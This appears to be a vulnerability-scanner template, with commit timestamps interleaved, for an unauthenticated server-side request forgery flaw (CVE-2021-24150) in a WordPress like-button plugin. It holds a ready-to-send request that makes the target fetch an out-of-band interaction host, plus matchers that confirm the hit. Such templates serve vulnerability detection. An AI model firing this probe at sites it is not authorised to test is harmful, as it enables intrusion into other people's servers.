2022-10-06 14:22:13 +00:00
id : CVE-2021-24150
info :
2023-04-04 20:55:04 +00:00
name : WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery
2022-10-06 14:22:13 +00:00
author : theamanrawat
severity : high
description : |
2023-04-04 20:55:04 +00:00
WordPress Like Button Rating plugin before 2.6.32 is susceptible to server-side request forgery. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-10-06 14:22:13 +00:00
reference :
- https://wpscan.com/vulnerability/6bc6023f-a5e7-4665-896c-95afa5b638fb
- https://wordpress.org/plugins/likebtn-like-button/
2022-10-06 19:12:17 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24150
2022-10-06 14:22:13 +00:00
classification :
2022-10-06 19:51:19 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-10-06 14:22:13 +00:00
cve-id : CVE-2021-24150
2022-10-06 19:51:19 +00:00
cwe-id : CWE-918
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:likebtn-like-button_project:likebtn-like-button:*:*:*:*:*:*:*:*
epss-score : 0.02348
2022-10-06 14:22:13 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2022-10-06 19:32:42 +00:00
tags : cve,cve2021,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button
2022-10-06 14:22:13 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-10-06 19:32:42 +00:00
- raw :
- |
@timeout : 10s
2023-03-09 14:48:32 +00:00
GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}" HTTP/1.1
2022-10-06 19:32:42 +00:00
Host : {{Hostname}}
2022-10-06 14:22:13 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- "Interactsh Server"
- type : status
status :
2022-10-06 19:12:17 +00:00
- 200
2023-04-04 20:55:04 +00:00
# Enhanced by md on 2023/04/04